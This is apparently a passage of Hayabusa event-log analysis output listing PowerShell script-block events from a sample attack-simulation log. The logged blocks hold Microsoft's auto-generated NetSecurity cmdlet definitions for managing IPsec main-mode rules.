[object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 